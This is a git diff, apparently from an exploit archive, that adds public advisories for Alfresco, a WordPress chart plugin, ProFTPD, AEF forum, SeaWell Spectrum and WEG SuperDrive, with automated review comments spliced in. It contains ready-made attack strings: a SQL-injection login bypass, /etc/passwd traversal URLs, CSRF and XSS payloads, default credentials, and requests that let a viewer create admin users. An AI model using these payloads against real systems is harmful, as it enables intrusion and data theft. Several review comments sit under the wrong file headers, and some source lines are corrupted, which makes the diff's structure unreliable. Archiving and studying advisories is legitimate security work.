diff --git a/platforms/multiple/remote/39258.txt b/platforms/multiple/remote/39258.txt
new file mode 100755
index 000000000..da8d546a1
--- /dev/null
+++ b/platforms/multiple/remote/39258.txt
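Review bot: The ten rows added at the end of files.csv do not follow the "Product Version - Title" form that this same commit normalizes across the ProFTPD and ManageEngine entries above; the SecurityFocus imports 39255–39259 carry the raw BID title instead, and 39258/39259 give no affected version even though the advisory body states "Alfresco Community Edition 4.2.f and earlier are vulnerable". For consistency, a row such as `+39258,platforms/multiple/remote/39258.txt,"Alfresco Community Edition <= 4.2.f - /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0` would match the rest of the index, and 39255–39257 and 39259 can be reshaped the same way. The 39256/39257 titles also embed the plugin slug twice ("Tera Charts (tera-charts) Plugin for WordPress"), which no other WordPress row in the visible context does.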
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/68http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
+
+Alfresco Community Edition is prone to multiple security vulnerabilities.
+
+An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
+
+Alfresco Community Edition 4.2.f and earlier are vulnerable.
+
+http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port
\ No newline at end of file
diff --git a/platforms/multiple/remote/39259.txt b/platforms/multiple/remote/39259.txt
new file mode 100755
index 000000000..dacc05948
--- /dev/null
+++ b/platforms/multiple/remote/39259.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/68http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
+
+Alfresco Community Edition is prone to multiple security vulnerabilities.
+
+An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
+
+Alfresco Community Edition 4.2.f and earlier are vulnerable.
+
+http://www.example.com/alfresco/cmisbrowser?url=http://internal_system:port
\ No newline at end of file
diff --git a/platforms/multiple/remote/8037.txt b/platforms/multiple/remote/8037.txt
index 4525322dc..17614d563 100755
--- a/platforms/multiple/remote/8037.txt
+++ b/platforms/multiple/remote/8037.txt
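Review bot: The `source:` line of the new 39258.txt is corrupted: the example request URL has been spliced into the middle of the SecurityFocus reference, leaving `bid/68` and ` 663/info` on either side of it, so the reference as committed resolves to nothing. From the surviving fragments the intended line is presumably `source: http://www.securityfocus.com/bid/68663/info`, which also fits the neighbouring imports in this commit (39255 cites bid/68658, 39256 and 39257 cite bid/68662), and the request URL then appears only once, on the last line, where 39259.txt already keeps it. The 39259.txt hunk on this same line has the identical defect, and its body text is otherwise a verbatim copy of 39258.txt although it documents a different parameter.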
@@ -1,17 +1,17 @@
-Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
-
-USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
-
-and a password of "1" (without quotes).
-
-which leads to a successful login. Different account logins can be made successful using the limit clase (e.g appending "LIMIT 5,1" will make you login with as the 5th account in the users table).
-
-As far as I can see in the mysql logs the query becomes:
-
-SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1
-
-I think the problem lies in the handling of the "%" character (probably that's some way to sanitize input to avoid format string things?).
-
-Anyway, %' effectively makes the single quote unescaped and that eventually allows for an SQL injection during login.
-
-# milw0rm.com [2009-02-10]
+Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
+
+USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
+
+and a password of "1" (without quotes).
+
+which leads to a successful login. Different account logins can be made successful using the limit clase (e.g appending "LIMIT 5,1" will make you login with as the 5th account in the users table).
+
+As far as I can see in the mysql logs the query becomes:
+
+SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1
+
+I think the problem lies in the handling of the "%" character (probably that's some way to sanitize input to avoid format string things?).
+
+Anyway, %' effectively makes the single quote unescaped and that eventually allows for an SQL injection during login.
+
+# milw0rm.com [2009-02-10]
diff --git a/platforms/php/webapps/39255.html b/platforms/php/webapps/39255.html new file mode 100755 index 000000000..f191b1847 --- /dev/null +++ b/platforms/php/webapps/39255.html @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/68658/info + +WEBMIS CMS is prone to a vulnerability that lets attackers upload arbitrary files. + +An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. + +
+ +
+ + + +
diff --git a/platforms/php/webapps/39256.txt b/platforms/php/webapps/39256.txt
new file mode 100755
index 000000000..0b55ed8d3
--- /dev/null
+++ b/platforms/php/webapps/39256.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/68662/info
+
+Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible.
+
+Tera Charts 0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd
+http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/39257.txt b/platforms/php/webapps/39257.txt
new file mode 100755
index 000000000..25e464ce3
--- /dev/null
+++ b/platforms/php/webapps/39257.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/68662/info
+
+Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible.
+
+Tera Charts 0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wp_test/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/39261.txt b/platforms/php/webapps/39261.txt
new file mode 100755
index 000000000..24a02c3ba
--- /dev/null
+++ b/platforms/php/webapps/39261.txt
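Review bot: The last two lines of the new 39256.txt are byte-for-byte the same `treemap.php` URL, so the second one adds nothing and looks like a paste error; the files.csv row added for 39256 in this commit covers only `charts/treemap.php`, with `charts/zoomabletreemap.php` split out into 39257.txt, so the duplicate should be dropped rather than edited into a second path. The descriptive body of 39256.txt and 39257.txt is otherwise identical and neither file says which of the two scripts it documents, so a one-line heading naming the affected script (e.g. `Affected script: charts/treemap.php, parameter fn`) would make each entry self-describing.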
@@ -0,0 +1,180 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-CSRF.txt
+
+
+Vendor:
+=============================
+www.anelectron.com/downloads/
+
+
+Product:
+====================================
+Advanced Electron Forum v1.0.9 (AEF)
+Exploit patched current version.
+
+
+Vulnerability Type:
+===================
+CSRF
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+In Admin panel no CSRF protections exist in multiple areas allowing remote
+attackers to make HTTP request on behalf of the victim if they
+currently have a valid session (logged in) and visit or click an infected
+link, resulting in some of the following destructions.
+
+0x01: Change current database settings
+
+0x02: Delete all Inbox / Sent Emails
+
+0x03: Delete all 'shouts'
+
+0x04: Delete all Topics
+
+by the way, edit profile, avatar and more all seem vulnerable as well..
+
+
+Exploit code(s):
+===============
+
+CSRF 0x01:
+
+change mysql db settings
+note: however you will need to know or guess the database name.
+
+
+ + + + + + +
+
+
+CSRF 0x02:
+
+Delete all Inbox / Sent emails...
+
+
+
+ + +
+ +
+ + +
+
+
+
+
+
+CSRF 0x03:
+
+Delete all 'Shouts'
+
+
+ + + + + + + +
+
+
+CSRF 0x04:
+
+Delete all 'Topics' via simple GET request, this will delete topics 1 thru
+7...
+
+http://localhost/AEF(1.0.9)_Install/index.php?act=deletetopic&topid=7,6,5,4,3,2,1
+
+
+Disclosure Timeline:
+=======================================
+Vendor Notification: NA
+January 17, 2016 : Public Disclosure
+
+
+
+Exploitation Technique:
+======================
+Remote
+
+
+Severity Level:
+================
+High
+
+
+Description:
+===================================================================
+Request Method(s): [+] POST / GET
+
+
+Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)
+
+
+===================================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx
diff --git a/platforms/php/webapps/39262.txt b/platforms/php/webapps/39262.txt
new file mode 100755
index 000000000..9b29041c0
--- /dev/null
+++ b/platforms/php/webapps/39262.txt
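Review bot: The product line `Exploit patched current version.` is ambiguous — it reads either as "the current version is patched" or as "the exploit works against the current, patched version" — and with `Vendor Notification: NA` there is no fix reference to resolve it, so the author should state plainly whether v1.0.9 as shipped is affected. The one PoC that survives in this rendering, CSRF 0x04, is a plain GET to `index.php?act=deletetopic&topid=...`, i.e. a destructive admin action with no per-session token, which also spells out the remediation: require POST plus an anti-CSRF token for every state-changing admin action. The hunk header counts 180 added lines but the form bodies for 0x01–0x03 are absent here, so those three claims cannot be checked from this view.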
@@ -0,0 +1,139 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt
+
+
+Vendor:
+=============================
+www.anelectron.com/downloads/
+
+
+Product:
+====================================
+Advanced Electron Forum v1.0.9 (AEF)
+Exploit patched current version.
+
+
+Vulnerability Type:
+===================
+Persistent XSS
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+In Admin panel under Edit Boards / General Stuff / General Options
+
+There is an option to sepcify a redirect URL for the forum.
+
+See --> Redirect Forum:
+Enter a URL to which this forum will be redirected to.
+
+The redirect input field is vulnerable to a persistent XSS that will be
+stored in the MySQL database
+and execute attacker supplied client side code each time a victim visits
+the following URLs.
+
+http://localhost/AEF(1.0.9)_Install/index.php?
+
+http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=forums&seadact=editforum&editforum=1
+
+
+
+Exploit code(s):
+===============
+
+Persistent XSS
+
+ + + + + + + + + + + + + + + + + + + + + +
+
+
+
+Some other misc XSS(s) under 'Signature' area.
+
+
+http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=signature
+on Anchor link setting
+http://"onMouseMove="alert(0)
+
+AND
+
+http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=writepm
+email link:
+mailto:"onMouseMove="alert(1)
+
+
+
+Disclosure Timeline:
+=====================================
+Vendor Notification: NA
+January 17, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+================
+High
+
+
+Description:
+=================================================================
+
+
+Request Method(s): [+] POST
+
+
+Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)
+
+
+Vulnerable Parameter(s): [+] 'fredirect'
+
+=================================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx
diff --git a/platforms/php/webapps/39263.txt b/platforms/php/webapps/39263.txt
new file mode 100755
index 000000000..14a5ec908
--- /dev/null
+++ b/platforms/php/webapps/39263.txt
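Review bot: The vulnerable parameter `'fredirect'` is named only in the footer, while the details section calls the field "Redirect Forum" and never ties the two together; one sentence in the details saying that the "Redirect Forum" input is submitted as `fredirect` would make the entry self-consistent (and "sepcify" is a typo). The two "misc" findings inject `"onMouseMove="alert(0)` into URL-valued fields, so all three are the same class of bug: a user-supplied URL placed into an HTML attribute without attribute-context encoding. The remediation is to validate the scheme of user-supplied URLs on input and HTML-encode them in attribute context on output.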
@@ -0,0 +1,113 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-RFI.txt
+
+
+
+Vendor:
+=============================
+www.anelectron.com/downloads/
+
+
+
+Product:
+================================
+Advanced Electron Forum v1.0.9 (AEF)
+Exploit patched current version.
+
+
+Vulnerability Type:
+============================
+Remote File Inclusion / CSRF
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+In Admin control panel there is option to Import Skins and one choice is
+using a web URL.
+
+From AEF:
+
+"Specify the URL of the theme on the net. The theme file must be a
+compressed archive (zip, tgz, tbz2, tar)."
+
+However there is no CSRF token or check made that this is a valid request
+made by the currently logged in user, resulting
+in arbitrary remote file imports from an attacker if the user visits or
+clicks an malicious link. Victims will then be left
+open to arbitrary malicious file downloads from anywhere on the net which
+may be used as a platform for further attacks...
+
+
+
+Exploit code(s):
+===============
+
+ + + + + + + +
+
+
+
+Disclosure Timeline:
+======================================
+Vendor Notification: NA
+January 17, 2016 : Public Disclosure
+
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+
+Severity Level:
+===============
+High
+
+
+
+Description:
+==================================================================
+
+
+Request Method(s): [+] POST
+
+
+Vulnerable Product: [+] Advanced Electron Forum v1.0.9 (AEF)
+
+
+
+==================================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx
diff --git a/platforms/php/webapps/39266.txt b/platforms/php/webapps/39266.txt
new file mode 100755
index 000000000..a6ca1ab4d
--- /dev/null
+++ b/platforms/php/webapps/39266.txt
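Review bot: The "Remote File Inclusion" label under `Vulnerability Type` does not match the details, which describe a CSRF on the Import Skins form that makes the logged-in admin's session fetch an attacker-chosen archive URL; no inclusion of remote code by the application is shown, so the entry is a CSRF leading to an unvalidated server-side download. A more accurate type line would be `CSRF / Unvalidated remote archive import`. The mitigation is the anti-CSRF token the text already says is missing, plus validation of the fetched archive's origin and contents before it is unpacked.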
@@ -0,0 +1,105 @@
+# Exploit Title: [SeaWell Networks Spectrum - Multiple Vulnerabilities]
+# Discovered by: Karn Ganeshen
+# Vendor Homepage: [http://www.seawellnetworks.com/spectrum/]
+# Versions Reported: [Spectrum SDC 02.05.00, Build 02.05.00.0016]
+
+CVE-ID:
+CVE-2015-8282
+CVE-2015-8283
+CVE-2015-8284
+
+About SeaWell Networks Spectrum
+
+Session Delivery Control
+
+SeaWell set out to improve the way operators control, monetize and scale their IP video offerings, to meet the growing subscriber demands for video delivered to smartphones, tablets and game consoles.
+
+The result – Spectrum – is what we call a “Multiscreen 2.0” Session Delivery Controller.
+
+Spectrum is high-performance, carrier-grade software that takes ABR video and repackages it – on-the-fly – into any other protocol, including Apple HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH.
+
+http://www.seawellnetworks.com/spectrum/
+
+Affected version
+Spectrum SDC 02.05.00
+Build 02.05.00.0016
+Copyright (c) 2015 SeaWell Networks Inc.
+
+A. CWE-255: Credentials Management
+CVE-2015-8282
+
+Weak, default login credentials - admin / admin
+
+B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
+CVE-2015-8283
+
+The configure_manage.php module accepts a file parameter which takes an unrestricted file path as input, allowing an attacker (non-admin, low- privileged user) to read arbitrary files on the system.
+
+PoC:
+
+https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd
+
+C. CWE-285: Improper Authorization
+CVE-2015-8284
+
+A low privileged, non-admin user, with only viewer privileges, can perform administrative functions, such as create, update, delete a user (including admin user), or access device's configuration files (policy.xml, cookie_config.xml, systemCfg.xml). The application lacks Authorization controls to restrict any non-admin users from performing admin functions.
+
+The application users can have admin or viewer privilege levels. Admin has full access to the device. Viewer has access to very restricted functions.
+
+It is possible for a viewer priv user to perform admin functions.
+
+PoC:
+
+Add new user [Admin function only]
+
+GET /system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow= HTTP/1.1
+
+https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=
+
+Here
+
+admin -> userlevel=9
+viewer -> userlevel=1
+
+Create new user with Admin privs
+Log in as viewer - try create new admin user - viewer1
+
+https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=
+
+0Success1
+
+Delete user
+
+https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4
+
+Modify existing user (including admin)
+log in as viewer - try change system (admin) user
+
+https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4
+
+0Success1
+
+Change Admin password
+log in as viewer - try change admin pass
+
+https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3
+
+0Success1
+
+Downloading configuration xml files
+
+viewer priv user has no access/option to config xmls via GUI. It is possible to download the configs by calling the url directly
+
+Access policy config xml
+https://IP/configure_manage.php?action=download_config&file=policy.xml
+
+Access cookie config xml
+https://IP/configure_manage.php?action=download_config&file=cookie_config.xml
+
+Access system config xml
+https://IP/configure_manage.php?action=download_config&file=systemCfg.xml
+
++++++
+--
+Best Regards,
+Karn Ganeshen
\ No newline at end of file
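Review bot: The "Modify existing user" PoC repeats the delete request (`action=delete_user&ekey=4&LActiveRow=sys_Luser_4`, with only the username changed to `system`) under a heading that says modify, so that claim is not actually demonstrated there; the only modification shown is the `update_user` request under "Change Admin password". The first add-user line also carries `userlevel=1` while the URL immediately after it uses `userlevel=9`, which reads as a copy-paste slip rather than two distinct cases. For CVE-2015-8283 and the config-download part of CVE-2015-8284 the same `configure_manage.php?action=download_config&file=` endpoint is the sink, so one server-side fix — canonicalise `file` against an allow-list of config names and enforce the admin role in that handler — covers both, and `download_config` requests from viewer-level sessions are the event worth alerting on.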
diff --git a/platforms/windows/local/39260.txt b/platforms/windows/local/39260.txt
new file mode 100755
index 000000000..8a3fea1ec
--- /dev/null
+++ b/platforms/windows/local/39260.txt
@@ -0,0 +1,66 @@
+
+WEG SuperDrive G2 v12.0.0 Insecure File Permissions
+
+
+Vendor: WEG Group
+Product web page: http://www.weg.net
+Affected version: SuperDrive G2 (v12.0.0 Build 20150930-J1.8.0_60-NB8.0.2)
+ SuperDrive (v7.0.0)
+
+Summary: SuperDrive is a Windows graph tool for parameter setting,
+control and monitor of WEG Drives. It permits to edit directly in the
+drive online parameters, or to edit offline parameter files stored
+in the microcomputer. It enables you to store parameters of all drives
+that exist in the installation. The software also incorporates functions
+enable the upload to the drive of the microcomputer parameters sets
+as well as the download from the drive to the microcomputer. The
+communication between drive and microcomputer is realized via RS232
+serial interface (point to point) or by RS485 for network linkage.
+
+Desc: SuperDrive suffers from an elevation of privileges vulnerability
+which can be used by a simple authenticated user that can change the
+executable file with a binary of choice. The vulnerability exist due
+to the improper permissions, with the 'C' flag (Change) for 'Authenticated
+Users' group.
+
+Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
+ Microsoft Windows 7 Professional SP1 (EN)
+ Java 1.8.0_60
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5294
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5294.php
+
+
+25.11.2015
+
+--
+
+
+C:\WEG\SuperDrive 7.0.0>cacls SuperDrive.exe
+C:\WEG\SuperDrive 7.0.0\SuperDrive.exe BUILTIN\Administrators:F
+ NT AUTHORITY\SYSTEM:F
+ BUILTIN\Users:R
+ NT AUTHORITY\Authenticated Users:C
+
+
+C:\WEG\SuperDrive 7.0.0>
+
+
+C:\WEG\SuperDrive G2 12.0.0>cacls *.exe
+C:\WEG\SuperDrive G2 12.0.0\SuperDriveG2.exe BUILTIN\Administrators:F
+ NT AUTHORITY\SYSTEM:F
+ BUILTIN\Users:R
+ NT AUTHORITY\Authenticated Users:C
+
+C:\WEG\SuperDrive G2 12.0.0\unins000.exe BUILTIN\Administrators:F
+ NT AUTHORITY\SYSTEM:F
+ BUILTIN\Users:R
+ NT AUTHORITY\Authenticated Users:C
+
+
+C:\WEG\SuperDrive G2 12.0.0>
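Review bot: The bare date line `25.11.2015` carries no label, so it is unclear whether it is the discovery, vendor-contact or test date, and the advisory gives no vendor response or fix, so a reader cannot tell whether later builds are affected; a labelled timeline (`Discovered: 25.11.2015`, `Vendor contacted: …`) would resolve that. The `cacls` listings are both the evidence and the verification step: `NT AUTHORITY\Authenticated Users:C` on `SuperDrive.exe`, `SuperDriveG2.exe` and `unins000.exe` is what lets any authenticated user replace the binaries, and after remediation the same listing should show only `R` for that group. The title names only G2 v12.0.0 although the affected-version block and the listings cover v7.0.0 as well.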